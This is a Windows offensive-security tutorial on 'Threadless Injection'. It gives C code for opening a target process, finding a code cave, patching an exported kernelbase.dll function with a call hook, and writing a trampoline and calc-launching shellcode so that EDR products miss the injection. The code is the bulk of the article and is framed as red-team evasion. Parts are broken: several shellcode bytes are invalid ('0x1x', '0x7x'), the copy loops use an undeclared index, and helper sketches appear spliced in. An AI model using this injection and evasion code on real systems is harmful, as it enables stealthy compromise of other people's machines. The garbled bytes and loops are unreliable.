Threadless Injection. Injecting shellcode into third-party processes to circumvent EDR

This article discusses Threadless Injection, a technique for injecting code into third-party processes without creating a remote thread. At the time of writing, it worked on Windows 11 23H2 x64 running in a virtual machine isolated from the network, with OS security features enabled.

info

Also see my previous article describing the Process Ghosting injection technique.

The standard shellcode injection procedure and subsequent shellcode execution involve the following steps:

Get a process handle (OpenProcess or NtOpenProcess);
Allocate memory for the payload (VirtualAllocEx or NtMapViewOfSection);
Write the payload to the allocated memory (WriteProcessMemory or Ghost Writing); and
Execute the shellcode (CreateRemoteThread or NtQueueApcThread).

Needless to say, this sequence of actions is well known to EDR tools; if a program implements it, a red flag is raised immediately, and the process is terminated.

Is it possible to write code that performs the same actions without directly using the WinAPI functions listed above? For the first three steps, this is feasible, but shellcode execution is a problem: if a program directly calls CreateRemoteThread or NtQueueApcThread, an EDR is all but certain to raise the alarm.

So, to fool the defense, this chain of actions has to be broken somehow. For example, you can hook an exported DLL function that a third-party app already calls and make this function work for you…

warning

This article is intended for security specialists operating under a contract; all information provided in it is for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication. Distribution of malware, disruption of systems, and violation of secrecy of correspondence are prosecuted by law.

The idea is as follows: you patch network functions of some legitimate software that already interacts with the network and then use these functions to communicate with your network resources. This is the essence of the Threadless Injection technique: you patch exported functions of a dynamic library used by a third-party process so that your code is executed when these functions are called. Its implementation involves the following steps:

Find a code cave that can accommodate your shellcode and trampoline;
Write the shellcode and trampoline to this memory area;
Patch an exported DLL function to make it execute your code; and
Wait for this function to be called, which will trigger shellcode execution.

But dynamic libraries can contain hundreds or even thousands of functions, and a randomly selected function might be unsuitable for your purposes. Who can guarantee that it will be called within a reasonable period of time (or will be called at all)?

To solve this issue, you have to examine the software you are going to use to intercept an exported function. Ideally, you need an app that calls certain DLL functions on a regular basis (e.g. when it accesses its temporary file on the disk and writes intermediate results to it or checks the availability of its servers on the network by calling the respective API at a certain interval). If you find such a function, you can be sure that the required call will occur before long.

On the other hand, this rule shouldn’t be abused: if an app calls some API too often (e.g. several times per second) and you hook such a call, the target app is likely to glitch or crash.

To conduct this research, let’s use API Monitor. This program shows in real time how WinAPI functions are called and which actions in the test program trigger these calls. In addition, you can see which DLLs are loaded into the process and which APIs they implement (i.e. you see more than a list of WinAPIs whose origin is unknown). Based on the monitoring data, you can decide which exported function is suitable for your purposes and should be intercepted.

Once you examine the test program and identify the required WinAPIs, you can start coding.

Coding

Let’s implement each step required to perform Threadless Injection in code.

First, you have to get a handle to the target process by its name:

HANDLE hProc = NULL;
LPCWSTR ps_name;
DWORD *procID;
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
HANDLE process_snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (!process_snap) return NULL;
if (Process32First(process_snap, &pe32)) {
    do {
        if (_wcsicmp(pe32.szExeFile, ps_name) == 0) {
            *procID = pe32.th32ProcessID;
            hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, *procID);
            if (!hProc) continue;
            return hProc;
        }
    } while (Process32Next(process_snap, &pe32));
}

Then you load the selected dynamic library whose export contains the API function required for your purposes (e.g. kernelbase.dll).

    HMODULE hModule = GetModuleHandleW(L"kernelbase.dll");
    if (hModule == NULL)
        hModule = LoadLibraryW(L"kernelbase.dll");

Next, you get the address of your API in the DLL:

  // victim_export_func is a function from the kernelbase.dll export that will be hooked
    void* dll_export_fun_addr = GetProcAddress(hModule, victim_export_func);
    if (dll_export_fun_addr == NULL) return 1;

Searching for a code cave (i.e. memory area where you can write your data):

    UINT_PTR  addr_of_codecave;
    uint64_t function_addr;
    BOOL gotchaCave;
  // Start search
    for (addr_of_codecave = (function_addr & 0xFFFFFFFFFFF70000) - 0x70000000;
      // Address range
        addr_of_codecave < function_addr + 0x70000000;
        // Memory browsing increment
        addr_of_codecave += 0x10000)
    {
        LPVOID lpAddr = VirtualAllocEx(hProc,
                addr_of_codecave,
                size,
                MEM_COMMIT | MEM_RESERVE,
                PAGE_EXECUTE_READWRITE);
        if (lpAddr == NULL) continue;
        gotchaCave = TRUE;
        break;
    }
    if (gotchaCave == TRUE) return addr_of_codecave;
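
The bounds of this search can be illustrated with plain address arithmetic. The sketch below is not part of the original code: the helper names and constants are hypothetical. It assumes that the 0x10000 step in the loop reflects the usual 64 KiB allocation granularity on Windows and that the 0x70000000 radius was chosen to stay within the roughly ±2 GiB reach of a 32-bit relative call.

```c
#include <stdint.h>

/* Assumption: 64 KiB allocation granularity, matching the loop's 0x10000 step. */
#define ALLOC_GRANULARITY 0x10000ULL
/* Search radius taken from the loop above; it is smaller than 2^31. */
#define SEARCH_RADIUS     0x70000000ULL

/* Rounds an address down to the nearest 64 KiB boundary. */
static uint64_t align_down(uint64_t addr)
{
    return addr & ~(ALLOC_GRANULARITY - 1);
}

/* Lowest candidate address: aligned function address minus the radius. */
static uint64_t search_start(uint64_t func_addr)
{
    return align_down(func_addr) - SEARCH_RADIUS;
}

/* Upper (exclusive) bound of the search window. */
static uint64_t search_end(uint64_t func_addr)
{
    return func_addr + SEARCH_RADIUS;
}
```

For a made-up function address of 0x7FF812345678, align_down() yields 0x7FF812340000, so the window starts at 0x7FF7A2340000 and every candidate in it is less than 2 GiB away from the function.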

The next step involves the trampoline and some address arithmetic. To make it clear, let’s define the trampoline and the payload first. I am going to use a standard payload, frequently used in PoC demos, that starts Calculator. The trampoline balances the stack, saves registers, and restores them after calling the payload:

unsigned char tramp_to_shellcode[] = {
        0x58, 0x48, 0x83, 0xE8, 0x05, 0x50,
        0x51, 0x52, 0x41, 0x50, 0x41, 0x51,
        0x41, 0x52, 0x41, 0x53, 0x48, 0xB9,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x48, 0x89, 0x08, 0x48,
        0x83, 0xEC, 0x40, 0xE8, 0x11, 0x00,
        0x00, 0x00, 0x48, 0x83, 0xC4, 0x40,
        0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59,
        0x41, 0x58, 0x5A, 0x59, 0x58, 0xFF,
        0xE0, 0x90
};
unsigned char shellcode[] = {
        0x53, 0x56, 0x57, 0x55, 0x54, 0x58,
        0x66, 0x83, 0xE4, 0xF0, 0x50, 0x6A,
        0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C,
        0x63, 0x54, 0x59, 0x48, 0x29, 0xD4,
        0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B,
        0x76, 0x18, 0x48, 0x8B, 0x76, 0x10,
        0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48,
        0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C,
        0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74,
        0x1x, 0x20, 0x48, 0x01, 0xFE, 0x8B,
        0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C,
        0x1x, 0x8D, 0x52, 0x02, 0xAD, 0x81,
        0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45,
        0x7x, 0xEF, 0x8B, 0x74, 0x1F, 0x1C,
        0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE,
        0x4x, 0x01, 0xF7, 0x99, 0xFF, 0xD7,
        0x48, 0x83, 0xC4, 0x68, 0x5C, 0x5D,
        0x5x, 0x5E, 0x5B, 0xC3
};

Reading the beginning of the function exported from the DLL and configuring the trampoline using the obtained data:

    int64_t originalBytes = *(int64_t*)dll_export_fun_addr;
  // The trampoline isn't damaged: the space in it at this offset is reserved by zeros
    *(uint64_t*)(tramp_to_shellcode + 0x12) = originalBytes;

Configuring memory and granting it the PAGE_EXECUTE_READWRITE rights to set the hook:

DWORD saveProtectFlags = 0;
if (!VirtualProtectEx(hProc, dll_export_fun_addr, 8, PAGE_EXECUTE_READWRITE, &saveProtectFlags)) return 1;

Creating a hook (call) in the function exported by the attacked library and configuring it:

// Call function opcode
unsigned char call_opcode_to_shell[] = { 0xe8, 0, 0, 0, 0 };
int call_addr = (remoteAddress - ((UINT_PTR)dll_export_fun_addr + 5));
// Configuring the call
*(int*)(call_opcode_to_shell + 1) = call_addr;
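
The operand of a near call (opcode 0xE8) is a signed 32-bit displacement counted from the end of the 5-byte instruction, which is why 5 is added to the function address above. The following sketch, which is not part of the original code, isolates this arithmetic and adds a range check. The function name call_rel32 and the addresses in the note below are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* A near CALL is one opcode byte (0xE8) followed by a 32-bit displacement. */
#define CALL_REL32_SIZE 5

/*
 * Computes the rel32 operand for a CALL located at call_site that should
 * transfer control to target. Returns false if the distance does not fit
 * into a signed 32-bit value, i.e. the addresses are too far apart.
 */
static bool call_rel32(uint64_t call_site, uint64_t target, int32_t *rel32_out)
{
    /* The displacement is relative to the address of the next instruction. */
    int64_t delta = (int64_t)(target - (call_site + CALL_REL32_SIZE));
    if (delta < INT32_MIN || delta > INT32_MAX)
        return false;
    *rel32_out = (int32_t)delta;
    return true;
}
```

For example, with a call site at 0x7FF800001000 and a target at 0x7FF800002000, the displacement is 0xFFB; swapping the two addresses gives -0x1005. A target more than about 2 GiB away cannot be encoded at all, which is presumably why the code cave is searched for near the hooked function.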

Writing the trampoline and payload and then changing the target memory attributes: first to PAGE_EXECUTE_READWRITE and then back to PAGE_EXECUTE_READ (when the job is done):

    VirtualProtectEx(hProc,
            call_opcode_to_shell,
            sizeof(call_opcode_to_shell),
            PAGE_EXECUTE_READWRITE,
            NULL);
    if (!WriteProcessMemory(hProc,
            dll_export_fun_addr,
            call_opcode_to_shell,
            sizeof(call_opcode_to_shell),
            &numOfWrittenBytes))
    return 1;
    unsigned char mypayload[sizeof(tramp_to_shellcode) + sizeof(shellcode)];
  // In these two loops, one large payload containing both the shellcode and the trampoline is created.
    for (size_t x = 0; x < sizeof(tramp_to_shellcode); ++x)
        mypayload[i] = tramp_to_shellcode[i];
    for (size_t x = 0; x < sizeof(shellcode); ++x)
        mypayload[sizeof(shellcode) + i] = shellcode[i];
  // Change memory access flags to enable writing
    if (!VirtualProtectEx(hProc,
            remoteAddress,
            sizeof(mypayload),
            PAGE_READWRITE,
            &saveProtectFlags))
    return 1;
  // Write payload
    if (!WriteProcessMemory(hProc,
            remoteAddress,
            mypayload,
            sizeof(mypayload),
            &numOfWrittenBytes))
    return 1;
  // Revert memory access rights
    if (!VirtualProtectEx(hProc,
            remoteAddress,
            sizeof(mypayload),
            PAGE_EXECUTE_READ,
            &saveProtectFlags))
    return 1;

Congrats! Now all you have to do is wait for the app to call the patched function. You won’t have to wait for long since the modified API is called on a regular basis (as confirmed by API Monitor).

Conclusions

Now you are familiar with the Threadless Injection technique, which can be implemented without explicitly calling thread creation functions. This breaks the standard injection pattern that EDR tools look for.

Of course, the above code is just a demonstration – a template that requires significant improvements to achieve true invisibility. This technique is neither a panacea nor a silver bullet that completely conceals your code. Remember: to give the Red Team a chance to win, all available techniques (injections, API calls, code obfuscation, etc.) should be used in combination. Good luck!
